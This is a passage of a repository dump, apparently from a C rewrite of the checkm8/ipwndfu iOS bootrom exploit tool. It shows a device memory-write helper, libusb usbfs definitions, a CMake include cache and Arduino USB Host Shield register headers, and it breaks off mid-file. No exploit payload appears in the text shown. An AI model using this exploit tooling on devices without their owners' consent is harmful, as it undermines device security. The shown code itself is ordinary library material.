| checkm8_debug_indent("\tfailed to get device bundle\n"); 237 | resp = calloc(1, sizeof(struct dev_cmd_resp)); 238 | resp->ret = ret; 239 | return resp; 240 | } 241 | 242 | resp = dev_write_memory(dev, addr, data, len); 243 | release_device_bundle(dev); 244 | return resp; 245 | } 246 | -------------------------------------------------------------------------------- /checkm8_libusb/src/os/linux_usbfs.h: -------------------------------------------------------------------------------- 1 | /* 2 | * usbfs header structures 3 | * Copyright © 2007 Daniel Drake 4 | * Copyright © 2001 Johannes Erdfelt 5 | * 6 | * This library is free software; you can redistribute it and/or 7 | * modify it under the terms of the GNU Lesser General Public 8 | * License as published by the Free Software Foundation; either 9 | * version 2.1 of the License, or (at your option) any later version. 10 | * 11 | * This library is distributed in the hope that it will be useful, 12 | * but WITHOUT ANY WARRANTY; without even the implied warranty of 13 | * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU 14 | * Lesser General Public License for more details. 15 | * 16 | * You should have received a copy of the GNU Lesser General Public 17 | * License along with this library; if not, write to the Free Software 18 | * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA 19 | */ 20 | 21 | #ifndef LIBUSB_USBFS_H 22 | #define LIBUSB_USBFS_H 23 | 24 | #include 25 | 26 | #define SYSFS_DEVICE_PATH "/sys/bus/usb/devices" 27 | 28 | struct usbfs_ctrltransfer { 29 | /* keep in sync with usbdevice_fs.h:usbdevfs_ctrltransfer */ 30 | uint8_t bmRequestType; 31 | uint8_t bRequest; 32 | uint16_t wValue; 33 | uint16_t wIndex; 34 | uint16_t wLength; 35 | 36 | uint32_t timeout; /* in milliseconds */ 37 | 38 | /* pointer to data */ 39 | void *data; 40 | }; 41 | 42 | struct usbfs_bulktransfer { 43 | /* keep in sync with usbdevice_fs.h:usbdevfs_bulktransfer */ 44 | unsigned int ep; 45 | unsigned int len; 46 | unsigned int timeout; /* in milliseconds */ 47 | 48 | /* pointer to data */ 49 | void *data; 50 | }; 51 | 52 | struct usbfs_setinterface { 53 | /* keep in sync with usbdevice_fs.h:usbdevfs_setinterface */ 54 | unsigned int interface; 55 | unsigned int altsetting; 56 | }; 57 | 58 | #define USBFS_MAXDRIVERNAME 255 59 | 60 | struct usbfs_getdriver { 61 | unsigned int interface; 62 | char driver[USBFS_MAXDRIVERNAME + 1]; 63 | }; 64 | 65 | #define USBFS_URB_SHORT_NOT_OK 0x01 66 | #define USBFS_URB_ISO_ASAP 0x02 67 | #define USBFS_URB_BULK_CONTINUATION 0x04 68 | #define USBFS_URB_QUEUE_BULK 0x10 69 | #define USBFS_URB_ZERO_PACKET 0x40 70 | 71 | enum usbfs_urb_type { 72 | USBFS_URB_TYPE_ISO = 0, 73 | USBFS_URB_TYPE_INTERRUPT = 1, 74 | USBFS_URB_TYPE_CONTROL = 2, 75 | USBFS_URB_TYPE_BULK = 3, 76 | }; 77 | 78 | struct usbfs_iso_packet_desc { 79 | unsigned int length; 80 | unsigned int actual_length; 81 | unsigned int status; 82 | }; 83 | 84 | #define MAX_BULK_BUFFER_LENGTH 16384 85 | #define MAX_CTRL_BUFFER_LENGTH 4096 86 | 87 | #define MAX_ISO_PACKETS_PER_URB 128 88 | 89 | struct usbfs_urb { 90 | unsigned char type; 91 | unsigned char endpoint; 92 | int status; 93 | unsigned int flags; 94 | void *buffer; 95 | int buffer_length; 96 | int actual_length; 97 | int start_frame; 98 | union { 99 | int number_of_packets; /* Only used for isoc urbs */ 100 | unsigned int stream_id; /* Only used with bulk streams */ 101 | }; 102 | int error_count; 103 | unsigned int signr; 104 | void *usercontext; 105 | struct usbfs_iso_packet_desc iso_frame_desc[0]; 106 | }; 107 | 108 | struct usbfs_connectinfo { 109 | unsigned int devnum; 110 | unsigned char slow; 111 | }; 112 | 113 | struct usbfs_ioctl { 114 | int ifno; /* interface 0..N ; negative numbers reserved */ 115 | int ioctl_code; /* MUST encode size + direction of data so the 116 | * macros in give correct values */ 117 | void *data; /* param buffer (in, or out) */ 118 | }; 119 | 120 | struct usbfs_hub_portinfo { 121 | unsigned char numports; 122 | unsigned char port[127]; /* port to device num mapping */ 123 | }; 124 | 125 | #define USBFS_CAP_ZERO_PACKET 0x01 126 | #define USBFS_CAP_BULK_CONTINUATION 0x02 127 | #define USBFS_CAP_NO_PACKET_SIZE_LIM 0x04 128 | #define USBFS_CAP_BULK_SCATTER_GATHER 0x08 129 | #define USBFS_CAP_REAP_AFTER_DISCONNECT 0x10 130 | 131 | #define USBFS_DISCONNECT_CLAIM_IF_DRIVER 0x01 132 | #define USBFS_DISCONNECT_CLAIM_EXCEPT_DRIVER 0x02 133 | 134 | struct usbfs_disconnect_claim { 135 | unsigned int interface; 136 | unsigned int flags; 137 | char driver[USBFS_MAXDRIVERNAME + 1]; 138 | }; 139 | 140 | struct usbfs_streams { 141 | unsigned int num_streams; /* Not used by USBDEVFS_FREE_STREAMS */ 142 | unsigned int num_eps; 143 | unsigned char eps[0]; 144 | }; 145 | 146 | #define IOCTL_USBFS_CONTROL _IOWR('U', 0, struct usbfs_ctrltransfer) 147 | #define IOCTL_USBFS_BULK _IOWR('U', 2, struct usbfs_bulktransfer) 148 | #define IOCTL_USBFS_RESETEP _IOR('U', 3, unsigned int) 149 | #define IOCTL_USBFS_SETINTF _IOR('U', 4, struct usbfs_setinterface) 150 | #define IOCTL_USBFS_SETCONFIG _IOR('U', 5, unsigned int) 151 | #define IOCTL_USBFS_GETDRIVER _IOW('U', 8, struct usbfs_getdriver) 152 | #define IOCTL_USBFS_SUBMITURB _IOR('U', 10, struct usbfs_urb) 153 | #define IOCTL_USBFS_DISCARDURB _IO('U', 11) 154 | #define IOCTL_USBFS_REAPURB _IOW('U', 12, void *) 155 | #define IOCTL_USBFS_REAPURBNDELAY _IOW('U', 13, void *) 156 | #define IOCTL_USBFS_CLAIMINTF _IOR('U', 15, unsigned int) 157 | #define IOCTL_USBFS_RELEASEINTF _IOR('U', 16, unsigned int) 158 | #define IOCTL_USBFS_CONNECTINFO _IOW('U', 17, struct usbfs_connectinfo) 159 | #define IOCTL_USBFS_IOCTL _IOWR('U', 18, struct usbfs_ioctl) 160 | #define IOCTL_USBFS_HUB_PORTINFO _IOR('U', 19, struct usbfs_hub_portinfo) 161 | #define IOCTL_USBFS_RESET _IO('U', 20) 162 | #define IOCTL_USBFS_CLEAR_HALT _IOR('U', 21, unsigned int) 163 | #define IOCTL_USBFS_DISCONNECT _IO('U', 22) 164 | #define IOCTL_USBFS_CONNECT _IO('U', 23) 165 | #define IOCTL_USBFS_CLAIM_PORT _IOR('U', 24, unsigned int) 166 | #define IOCTL_USBFS_RELEASE_PORT _IOR('U', 25, unsigned int) 167 | #define IOCTL_USBFS_GET_CAPABILITIES _IOR('U', 26, __u32) 168 | #define IOCTL_USBFS_DISCONNECT_CLAIM _IOR('U', 27, struct usbfs_disconnect_claim) 169 | #define IOCTL_USBFS_ALLOC_STREAMS _IOR('U', 28, struct usbfs_streams) 170 | #define IOCTL_USBFS_FREE_STREAMS _IOR('U', 29, struct usbfs_streams) 171 | 172 | extern usbi_mutex_static_t linux_hotplug_lock; 173 | 174 | #if defined(HAVE_LIBUDEV) 175 | int linux_udev_start_event_monitor(void); 176 | int linux_udev_stop_event_monitor(void); 177 | int linux_udev_scan_devices(struct libusb_context *ctx); 178 | void linux_udev_hotplug_poll(void); 179 | #else 180 | int linux_netlink_start_event_monitor(void); 181 | int linux_netlink_stop_event_monitor(void); 182 | void linux_netlink_hotplug_poll(void); 183 | #endif 184 | 185 | void linux_hotplug_enumerate(uint8_t busnum, uint8_t devaddr, const char *sys_name); 186 | void linux_device_disconnected(uint8_t busnum, uint8_t devaddr); 187 | 188 | int linux_get_device_address (struct libusb_context *ctx, int detached, 189 | uint8_t *busnum, uint8_t *devaddr, const char *dev_node, 190 | const char *sys_name, int fd); 191 | int linux_enumerate_device(struct libusb_context *ctx, 192 | uint8_t busnum, uint8_t devaddr, const char *sysfs_dir); 193 | 194 | #endif 195 | -------------------------------------------------------------------------------- /CMakeFiles/checkm8_libusb.dir/C.includecache: -------------------------------------------------------------------------------- 1 | #IncludeRegexLine: ^[ ]*[#%][ ]*(include|import)[ ]*[<"]([^">]+)([">]) 2 | 3 | #IncludeRegexScan: ^.*$ 4 | 5 | #IncludeRegexComplain: ^$ 6 | 7 | #IncludeRegexTransform: 8 | 9 | /home/toor/ipwndfu_rewrite_c/checkm8_libusb/src/core.c 10 | libusb_config.h 11 | /home/toor/ipwndfu_rewrite_c/checkm8_libusb/src/libusb_config.h 12 | errno.h 13 | - 14 | stdarg.h 15 | - 16 | stdio.h 17 | - 18 | stdlib.h 19 | - 20 | string.h 21 | - 22 | sys/types.h 23 | - 24 | sys/time.h 25 | - 26 | syslog.h 27 | - 28 | android/log.h 29 | - 30 | libusbi.h 31 | /home/toor/ipwndfu_rewrite_c/checkm8_libusb/src/libusbi.h 32 | hotplug.h 33 | /home/toor/ipwndfu_rewrite_c/checkm8_libusb/src/hotplug.h 34 | 35 | /home/toor/ipwndfu_rewrite_c/checkm8_libusb/src/descriptor.c 36 | libusb_config.h 37 | /home/toor/ipwndfu_rewrite_c/checkm8_libusb/src/libusb_config.h 38 | errno.h 39 | - 40 | stdint.h 41 | - 42 | stdlib.h 43 | - 44 | string.h 45 | - 46 | libusbi.h 47 | /home/toor/ipwndfu_rewrite_c/checkm8_libusb/src/libusbi.h 48 | 49 | /home/toor/ipwndfu_rewrite_c/checkm8_libusb/src/hotplug.c 50 | libusb_config.h 51 | /home/toor/ipwndfu_rewrite_c/checkm8_libusb/src/libusb_config.h 52 | errno.h 53 | - 54 | stdio.h 55 | - 56 | stdlib.h 57 | - 58 | string.h 59 | - 60 | sys/types.h 61 | - 62 | assert.h 63 | - 64 | libusbi.h 65 | /home/toor/ipwndfu_rewrite_c/checkm8_libusb/src/libusbi.h 66 | hotplug.h 67 | /home/toor/ipwndfu_rewrite_c/checkm8_libusb/src/hotplug.h 68 | stdio.h 69 | - 70 | stdlib.h 71 | - 72 | time.h 73 | - 74 | src.h 75 | - 76 | 77 | /home/toor/ipwndfu_rewrite_c/checkm8_libusb/src/hotplug.h 78 | libusbi.h 79 | /home/toor/ipwndfu_rewrite_c/checkm8_libusb/src/libusbi.h 80 | 81 | /home/toor/ipwndfu_rewrite_c/checkm8_libusb/src/io.c 82 | libusb_config.h 83 | /home/toor/ipwndfu_rewrite_c/checkm8_libusb/src/libusb_config.h 84 | assert.h 85 | - 86 | errno.h 87 | - 88 | stdint.h 89 | - 90 | stdlib.h 91 | - 92 | string.h 93 | - 94 | time.h 95 | - 96 | sys/time.h 97 | - 98 | unistd.h 99 | - 100 | sys/timerfd.h 101 | - 102 | libusbi.h 103 | /home/toor/ipwndfu_rewrite_c/checkm8_libusb/src/libusbi.h 104 | hotplug.h 105 | /home/toor/ipwndfu_rewrite_c/checkm8_libusb/src/hotplug.h 106 | 107 | /home/toor/ipwndfu_rewrite_c/checkm8_libusb/src/libusbi.h 108 | libusb_config.h 109 | /home/toor/ipwndfu_rewrite_c/checkm8_libusb/src/libusb_config.h 110 | stdlib.h 111 | - 112 | assert.h 113 | - 114 | stddef.h 115 | - 116 | stdint.h 117 | - 118 | time.h 119 | - 120 | stdarg.h 121 | - 122 | poll.h 123 | - 124 | missing.h 125 | - 126 | libusb.h 127 | /home/toor/ipwndfu_rewrite_c/checkm8_libusb/src/libusb.h 128 | version.h 129 | /home/toor/ipwndfu_rewrite_c/checkm8_libusb/src/version.h 130 | os/threads_posix.h 131 | /home/toor/ipwndfu_rewrite_c/checkm8_libusb/src/os/threads_posix.h 132 | os/threads_windows.h 133 | /home/toor/ipwndfu_rewrite_c/checkm8_libusb/src/os/threads_windows.h 134 | unistd.h 135 | - 136 | os/poll_posix.h 137 | /home/toor/ipwndfu_rewrite_c/checkm8_libusb/src/os/poll_posix.h 138 | os/poll_windows.h 139 | /home/toor/ipwndfu_rewrite_c/checkm8_libusb/src/os/poll_windows.h 140 | 141 | /home/toor/ipwndfu_rewrite_c/checkm8_libusb/src/os/linux_netlink.c 142 | libusb_config.h 143 | /home/toor/ipwndfu_rewrite_c/checkm8_libusb/src/os/libusb_config.h 144 | assert.h 145 | - 146 | errno.h 147 | - 148 | fcntl.h 149 | - 150 | poll.h 151 | - 152 | stdio.h 153 | - 154 | stdlib.h 155 | - 156 | string.h 157 | - 158 | unistd.h 159 | - 160 | sys/types.h 161 | - 162 | asm/types.h 163 | - 164 | sys/socket.h 165 | - 166 | linux/netlink.h 167 | - 168 | ../libusbi.h 169 | /home/toor/ipwndfu_rewrite_c/checkm8_libusb/src/libusbi.h 170 | linux_usbfs.h 171 | /home/toor/ipwndfu_rewrite_c/checkm8_libusb/src/os/linux_usbfs.h 172 | 173 | /home/toor/ipwndfu_rewrite_c/checkm8_libusb/src/os/linux_udev.c 174 | libusb_config.h 175 | /home/toor/ipwndfu_rewrite_c/checkm8_libusb/src/os/libusb_config.h 176 | assert.h 177 | - 178 | ctype.h 179 | - 180 | dirent.h 181 | - 182 | errno.h 183 | - 184 | fcntl.h 185 | - 186 | poll.h 187 | - 188 | stdio.h 189 | - 190 | stdlib.h 191 | - 192 | string.h 193 | - 194 | sys/ioctl.h 195 | - 196 | sys/stat.h 197 | - 198 | sys/types.h 199 | - 200 | sys/utsname.h 201 | - 202 | sys/socket.h 203 | - 204 | unistd.h 205 | - 206 | libudev.h 207 | - 208 | ../libusbi.h 209 | /home/toor/ipwndfu_rewrite_c/checkm8_libusb/src/libusbi.h 210 | linux_usbfs.h 211 | /home/toor/ipwndfu_rewrite_c/checkm8_libusb/src/os/linux_usbfs.h 212 | 213 | /home/toor/ipwndfu_rewrite_c/checkm8_libusb/src/os/linux_usbfs.c 214 | libusb_config.h 215 | /home/toor/ipwndfu_rewrite_c/checkm8_libusb/src/os/libusb_config.h 216 | assert.h 217 | - 218 | ctype.h 219 | - 220 | dirent.h 221 | - 222 | errno.h 223 | - 224 | fcntl.h 225 | - 226 | poll.h 227 | - 228 | stdio.h 229 | - 230 | stdlib.h 231 | - 232 | string.h 233 | - 234 | sys/ioctl.h 235 | - 236 | sys/mman.h 237 | - 238 | sys/stat.h 239 | - 240 | sys/types.h 241 | - 242 | sys/utsname.h 243 | - 244 | time.h 245 | - 246 | ../libusbi.h 247 | /home/toor/ipwndfu_rewrite_c/checkm8_libusb/src/libusbi.h 248 | linux_usbfs.h 249 | /home/toor/ipwndfu_rewrite_c/checkm8_libusb/src/os/linux_usbfs.h 250 | 251 | /home/toor/ipwndfu_rewrite_c/checkm8_libusb/src/os/linux_usbfs.h 252 | linux/types.h 253 | - 254 | 255 | /home/toor/ipwndfu_rewrite_c/checkm8_libusb/src/os/poll_posix.c 256 | libusb_config.h 257 | /home/toor/ipwndfu_rewrite_c/checkm8_libusb/src/os/libusb_config.h 258 | unistd.h 259 | - 260 | fcntl.h 261 | - 262 | errno.h 263 | - 264 | stdlib.h 265 | - 266 | ../libusbi.h 267 | /home/toor/ipwndfu_rewrite_c/checkm8_libusb/src/libusbi.h 268 | 269 | /home/toor/ipwndfu_rewrite_c/checkm8_libusb/src/os/poll_posix.h 270 | 271 | /home/toor/ipwndfu_rewrite_c/checkm8_libusb/src/os/threads_posix.c 272 | libusb_config.h 273 | /home/toor/ipwndfu_rewrite_c/checkm8_libusb/src/os/libusb_config.h 274 | time.h 275 | - 276 | unistd.h 277 | - 278 | sys/syscall.h 279 | - 280 | pthread.h 281 | - 282 | windows.h 283 | - 284 | threads_posix.h 285 | /home/toor/ipwndfu_rewrite_c/checkm8_libusb/src/os/threads_posix.h 286 | ../libusbi.h 287 | /home/toor/ipwndfu_rewrite_c/checkm8_libusb/src/libusbi.h 288 | 289 | /home/toor/ipwndfu_rewrite_c/checkm8_libusb/src/os/threads_posix.h 290 | pthread.h 291 | - 292 | sys/time.h 293 | - 294 | 295 | /home/toor/ipwndfu_rewrite_c/checkm8_libusb/src/strerror.c 296 | libusb_config.h 297 | /home/toor/ipwndfu_rewrite_c/checkm8_libusb/src/libusb_config.h 298 | locale.h 299 | - 300 | stdlib.h 301 | - 302 | string.h 303 | - 304 | strings.h 305 | - 306 | libusbi.h 307 | /home/toor/ipwndfu_rewrite_c/checkm8_libusb/src/libusbi.h 308 | 309 | /home/toor/ipwndfu_rewrite_c/checkm8_libusb/src/sync.c 310 | libusb_config.h 311 | /home/toor/ipwndfu_rewrite_c/checkm8_libusb/src/libusb_config.h 312 | errno.h 313 | - 314 | stdint.h 315 | - 316 | stdlib.h 317 | - 318 | string.h 319 | - 320 | libusbi.h 321 | /home/toor/ipwndfu_rewrite_c/checkm8_libusb/src/libusbi.h 322 | 323 | /home/toor/ipwndfu_rewrite_c/checkm8_libusb/src/version.h 324 | version_nano.h 325 | /home/toor/ipwndfu_rewrite_c/checkm8_libusb/src/version_nano.h 326 | 327 | /home/toor/ipwndfu_rewrite_c/checkm8_libusb/src/version_nano.h 328 | 329 | include/checkm8_config.h 330 | 331 | include/libusb.h 332 | stdint.h 333 | - 334 | sys/types.h 335 | - 336 | sys/time.h 337 | - 338 | time.h 339 | - 340 | limits.h 341 | - 342 | windows.h 343 | - 344 | winsock.h 345 | - 346 | 347 | include/libusb_config.h 348 | checkm8_config.h 349 | include/checkm8_config.h 350 | 351 | -------------------------------------------------------------------------------- /checkm8_arduino/lib/hostshield/max3421e.h: -------------------------------------------------------------------------------- 1 | /* Copyright (C) 2011 Circuits At Home, LTD. All rights reserved. 2 | 3 | This program is free software; you can redistribute it and/or modify 4 | it under the terms of the GNU General Public License as published by 5 | the Free Software Foundation; either version 2 of the License, or 6 | (at your option) any later version. 7 | 8 | This program is distributed in the hope that it will be useful, 9 | but WITHOUT ANY WARRANTY; without even the implied warranty of 10 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 11 | GNU General Public License for more details. 12 | 13 | You should have received a copy of the GNU General Public License 14 | along with this program; if not, write to the Free Software 15 | Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA 16 | 17 | Contact information 18 | ------------------- 19 | 20 | Circuits At Home, LTD 21 | Web : http://www.circuitsathome.com 22 | e-mail : support@circuitsathome.com 23 | */ 24 | #if !defined(_usb_h_) || defined(_max3421e_h_) 25 | #error "Never include max3421e.h directly; include Usb.h instead" 26 | #else 27 | 28 | #define _max3421e_h_ 29 | 30 | /* MAX3421E register/bit names and bitmasks */ 31 | 32 | /* Arduino pin definitions */ 33 | /* pin numbers to port numbers */ 34 | 35 | #define SE0 0 36 | #define SE1 1 37 | #define FSHOST 2 38 | #define LSHOST 3 39 | 40 | /* MAX3421E command byte format: rrrrr0wa where 'r' is register number */ 41 | // 42 | // MAX3421E Registers in HOST mode. 43 | // 44 | #define rRCVFIFO 0x08 //1<<3 45 | #define rSNDFIFO 0x10 //2<<3 46 | #define rSUDFIFO 0x20 //4<<3 47 | #define rRCVBC 0x30 //6<<3 48 | #define rSNDBC 0x38 //7<<3 49 | 50 | #define rUSBIRQ 0x68 //13<<3 51 | /* USBIRQ Bits */ 52 | #define bmVBUSIRQ 0x40 //b6 53 | #define bmNOVBUSIRQ 0x20 //b5 54 | #define bmOSCOKIRQ 0x01 //b0 55 | 56 | #define rUSBIEN 0x70 //14<<3 57 | /* USBIEN Bits */ 58 | #define bmVBUSIE 0x40 //b6 59 | #define bmNOVBUSIE 0x20 //b5 60 | #define bmOSCOKIE 0x01 //b0 61 | 62 | #define rUSBCTL 0x78 //15<<3 63 | /* USBCTL Bits */ 64 | #define bmCHIPRES 0x20 //b5 65 | #define bmPWRDOWN 0x10 //b4 66 | 67 | #define rCPUCTL 0x80 //16<<3 68 | /* CPUCTL Bits */ 69 | #define bmPUSLEWID1 0x80 //b7 70 | #define bmPULSEWID0 0x40 //b6 71 | #define bmIE 0x01 //b0 72 | 73 | #define rPINCTL 0x88 //17<<3 74 | /* PINCTL Bits */ 75 | #define bmFDUPSPI 0x10 //b4 76 | #define bmINTLEVEL 0x08 //b3 77 | #define bmPOSINT 0x04 //b2 78 | #define bmGPXB 0x02 //b1 79 | #define bmGPXA 0x01 //b0 80 | // GPX pin selections 81 | #define GPX_OPERATE 0x00 82 | #define GPX_VBDET 0x01 83 | #define GPX_BUSACT 0x02 84 | #define GPX_SOF 0x03 85 | 86 | #define rREVISION 0x90 //18<<3 87 | 88 | #define rIOPINS1 0xa0 //20<<3 89 | 90 | /* IOPINS1 Bits */ 91 | #define bmGPOUT0 0x01 92 | #define bmGPOUT1 0x02 93 | #define bmGPOUT2 0x04 94 | #define bmGPOUT3 0x08 95 | #define bmGPIN0 0x10 96 | #define bmGPIN1 0x20 97 | #define bmGPIN2 0x40 98 | #define bmGPIN3 0x80 99 | 100 | #define rIOPINS2 0xa8 //21<<3 101 | /* IOPINS2 Bits */ 102 | #define bmGPOUT4 0x01 103 | #define bmGPOUT5 0x02 104 | #define bmGPOUT6 0x04 105 | #define bmGPOUT7 0x08 106 | #define bmGPIN4 0x10 107 | #define bmGPIN5 0x20 108 | #define bmGPIN6 0x40 109 | #define bmGPIN7 0x80 110 | 111 | #define rGPINIRQ 0xb0 //22<<3 112 | /* GPINIRQ Bits */ 113 | #define bmGPINIRQ0 0x01 114 | #define bmGPINIRQ1 0x02 115 | #define bmGPINIRQ2 0x04 116 | #define bmGPINIRQ3 0x08 117 | #define bmGPINIRQ4 0x10 118 | #define bmGPINIRQ5 0x20 119 | #define bmGPINIRQ6 0x40 120 | #define bmGPINIRQ7 0x80 121 | 122 | #define rGPINIEN 0xb8 //23<<3 123 | /* GPINIEN Bits */ 124 | #define bmGPINIEN0 0x01 125 | #define bmGPINIEN1 0x02 126 | #define bmGPINIEN2 0x04 127 | #define bmGPINIEN3 0x08 128 | #define bmGPINIEN4 0x10 129 | #define bmGPINIEN5 0x20 130 | #define bmGPINIEN6 0x40 131 | #define bmGPINIEN7 0x80 132 | 133 | #define rGPINPOL 0xc0 //24<<3 134 | /* GPINPOL Bits */ 135 | #define bmGPINPOL0 0x01 136 | #define bmGPINPOL1 0x02 137 | #define bmGPINPOL2 0x04 138 | #define bmGPINPOL3 0x08 139 | #define bmGPINPOL4 0x10 140 | #define bmGPINPOL5 0x20 141 | #define bmGPINPOL6 0x40 142 | #define bmGPINPOL7 0x80 143 | 144 | #define rHIRQ 0xc8 //25<<3 145 | /* HIRQ Bits */ 146 | #define bmBUSEVENTIRQ 0x01 // indicates BUS Reset Done or BUS Resume 147 | #define bmRWUIRQ 0x02 148 | #define bmRCVDAVIRQ 0x04 149 | #define bmSNDBAVIRQ 0x08 150 | #define bmSUSDNIRQ 0x10 151 | #define bmCONDETIRQ 0x20 152 | #define bmFRAMEIRQ 0x40 153 | #define bmHXFRDNIRQ 0x80 154 | 155 | #define rHIEN 0xd0 //26<<3 156 | 157 | /* HIEN Bits */ 158 | #define bmBUSEVENTIE 0x01 159 | #define bmRWUIE 0x02 160 | #define bmRCVDAVIE 0x04 161 | #define bmSNDBAVIE 0x08 162 | #define bmSUSDNIE 0x10 163 | #define bmCONDETIE 0x20 164 | #define bmFRAMEIE 0x40 165 | #define bmHXFRDNIE 0x80 166 | 167 | #define rMODE 0xd8 //27<<3 168 | 169 | /* MODE Bits */ 170 | #define bmHOST 0x01 171 | #define bmLOWSPEED 0x02 172 | #define bmHUBPRE 0x04 173 | #define bmSOFKAENAB 0x08 174 | #define bmSEPIRQ 0x10 175 | #define bmDELAYISO 0x20 176 | #define bmDMPULLDN 0x40 177 | #define bmDPPULLDN 0x80 178 | 179 | #define rPERADDR 0xe0 //28<<3 180 | 181 | #define rHCTL 0xe8 //29<<3 182 | /* HCTL Bits */ 183 | #define bmBUSRST 0x01 184 | #define bmFRMRST 0x02 185 | #define bmSAMPLEBUS 0x04 186 | #define bmSIGRSM 0x08 187 | #define bmRCVTOG0 0x10 188 | #define bmRCVTOG1 0x20 189 | #define bmSNDTOG0 0x40 190 | #define bmSNDTOG1 0x80 191 | 192 | #define rHXFR 0xf0 //30<<3 193 | /* Host transfer token values for writing the HXFR register (R30) */ 194 | /* OR this bit field with the endpoint number in bits 3:0 */ 195 | #define tokSETUP 0x10 // HS=0, ISO=0, OUTNIN=0, SETUP=1 196 | #define tokIN 0x00 // HS=0, ISO=0, OUTNIN=0, SETUP=0 197 | #define tokOUT 0x20 // HS=0, ISO=0, OUTNIN=1, SETUP=0 198 | #define tokINHS 0x80 // HS=1, ISO=0, OUTNIN=0, SETUP=0 199 | #define tokOUTHS 0xA0 // HS=1, ISO=0, OUTNIN=1, SETUP=0 200 | #define tokISOIN 0x40 // HS=0, ISO=1, OUTNIN=0, SETUP=0 201 | #define tokISOOUT 0x60 // HS=0, ISO=1, OUTNIN=1, SETUP=0 202 | 203 | #define rHRSL 0xf8 //31<<3 204 | 205 | /* HRSL Bits */ 206 | #define bmRCVTOGRD 0x10 207 | #define bmSNDTOGRD 0x20 208 | #define bmKSTATUS 0x40 209 | #define bmJSTATUS 0x80 210 | #define bmSE0 0x00 //SE0 - disconnect state 211 | #define bmSE1 0xc0 //SE1 - illegal state 212 | 213 | /* Host error result codes, the 4 LSB's in the HRSL register */ 214 | #define hrSUCCESS 0x00 215 | #define hrBUSY 0x01 216 | #define hrBADREQ 0x02 217 | #define hrUNDEF 0x03 218 | #define hrNAK 0x04 219 | #define hrSTALL 0x05 220 | #define hrTOGERR 0x06 221 | #define hrWRONGPID 0x07 222 | #define hrBADBC 0x08 223 | #define hrPIDERR 0x09 224 | #define hrPKTERR 0x0A 225 | #define hrCRCERR 0x0B 226 | #define hrKERR 0x0C 227 | #define hrJERR 0x0D 228 | #define hrTIMEOUT 0x0E 229 | #define hrBABBLE 0x0F 230 | 231 | #define MODE_FS_HOST (bmDPPULLDN|bmDMPULLDN|bmHOST|bmSOFKAENAB) 232 | #define MODE_LS_HOST (bmDPPULLDN|bmDMPULLDN|bmHOST|bmLOWSPEED|bmSOFKAENAB) 233 | 234 | 235 | #endif //_max3421e_h_ 236 | -------------------------------------------------------------------------------- /checkm8_arduino/lib/hostshield/settings.h: -------------------------------------------------------------------------------- 1 | /* Copyright (C) 2011 Circuits At Home, LTD. All rights reserved. 2 | 3 | This program is free software; you can redistribute it and/or modify 4 | it under the terms of the GNU General Public License as published by 5 | the Free Software Foundation; either version 2 of the License, or 6 | (at your option) any later version. 7 | 8 | This program is distributed in the hope that it will be useful, 9 | but WITHOUT ANY WARRANTY; without even the implied warranty of 10 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 11 | GNU General Public License for more details. 12 | 13 | You should have received a copy of the GNU General Public License 14 | along with this program; if not, write to the Free Software 15 | Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA 16 | 17 | Contact information 18 | ------------------- 19 | 20 | Circuits At Home, LTD 21 | Web : http://www.circuitsathome.com 22 | e-mail : support@circuitsathome.com 23 | */ 24 | 25 | #ifndef USB_HOST_SHIELD_SETTINGS_H 26 | #define USB_HOST_SHIELD_SETTINGS_H 27 | #include "macros.h" 28 | 29 | //////////////////////////////////////////////////////////////////////////////// 30 | // SPI Configuration 31 | //////////////////////////////////////////////////////////////////////////////// 32 | #ifndef USB_SPI 33 | #define USB_SPI SPI 34 | //#define USB_SPI SPI1 35 | #endif 36 | 37 | //////////////////////////////////////////////////////////////////////////////// 38 | // DEBUGGING 39 | //////////////////////////////////////////////////////////////////////////////// 40 | 41 | /* Set this to 1 to activate serial debugging */ 42 | #define ENABLE_UHS_DEBUGGING 0 43 | 44 | /* This can be used to select which serial port to use for debugging if 45 | * multiple serial ports are available. 46 | * For example Serial3. 47 | */ 48 | #ifndef USB_HOST_SERIAL 49 | #define USB_HOST_SERIAL Serial 50 | #endif 51 | 52 | //////////////////////////////////////////////////////////////////////////////// 53 | // Manual board activation 54 | //////////////////////////////////////////////////////////////////////////////// 55 | 56 | /* Set this to 1 if you are using an Arduino Mega ADK board with MAX3421e built-in */ 57 | #define USE_UHS_MEGA_ADK 0 // If you are using Arduino 1.5.5 or newer there is no need to do this manually 58 | 59 | /* Set this to 1 if you are using a Black Widdow */ 60 | #define USE_UHS_BLACK_WIDDOW 0 61 | 62 | /* Set this to a one to use the xmem2 lock. This is needed for multitasking and threading */ 63 | #define USE_XMEM_SPI_LOCK 0 64 | 65 | //////////////////////////////////////////////////////////////////////////////// 66 | // Wii IR camera 67 | //////////////////////////////////////////////////////////////////////////////// 68 | 69 | /* Set this to 1 to activate code for the Wii IR camera */ 70 | #define ENABLE_WII_IR_CAMERA 0 71 | 72 | //////////////////////////////////////////////////////////////////////////////// 73 | // MASS STORAGE 74 | //////////////////////////////////////////////////////////////////////////////// 75 | // <<<<<<<<<<<<<<<< IMPORTANT >>>>>>>>>>>>>>> 76 | // Set this to 1 to support single LUN devices, and save RAM. -- I.E. thumb drives. 77 | // Each LUN needs ~13 bytes to be able to track the state of each unit. 78 | #ifndef MASS_MAX_SUPPORTED_LUN 79 | #define MASS_MAX_SUPPORTED_LUN 8 80 | #endif 81 | 82 | //////////////////////////////////////////////////////////////////////////////// 83 | // Set to 1 to use the faster spi4teensy3 driver. 84 | //////////////////////////////////////////////////////////////////////////////// 85 | #ifndef USE_SPI4TEENSY3 86 | #define USE_SPI4TEENSY3 1 87 | #endif 88 | 89 | // Disabled on the Teensy LC, as it is incompatible for now 90 | #if defined(__MKL26Z64__) 91 | #undef USE_SPI4TEENSY3 92 | #define USE_SPI4TEENSY3 0 93 | #endif 94 | 95 | //////////////////////////////////////////////////////////////////////////////// 96 | // AUTOMATIC Settings 97 | //////////////////////////////////////////////////////////////////////////////// 98 | 99 | // No user serviceable parts below this line. 100 | // DO NOT change anything below here unless you are a developer! 101 | 102 | #include "version_helper.h" 103 | 104 | #if defined(__GNUC__) && defined(__AVR__) 105 | 